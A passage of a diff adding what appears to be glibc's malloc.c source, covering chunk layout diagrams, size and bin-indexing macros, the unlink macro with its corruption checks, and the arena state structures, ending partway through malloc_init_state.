+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Same, except also perform an argument and result check.  First, we check
+   that the padding done by request2size didn't result in an integer
+   overflow.  Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
+   size isn't so large that a later alignment would lead to another integer
+   overflow.  */
+#define checked_request2size(req, sz) \
+({				    \
+  (sz) = request2size (req);	    \
+  if (((sz) < (req))		    \
+      || REQUEST_OUT_OF_RANGE (sz)) \
+    {				    \
+      __set_errno (ENOMEM);	    \
+      return 0;			    \
+    }				    \
+})
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr ("corrupted size vs. prev_size");			      \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr ("corrupted double-linked list");			      \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (chunksize_nomask (P))			      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr ("corrupted double-linked list (not small)");   \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given it's sole purpose is to reduce number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunked are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
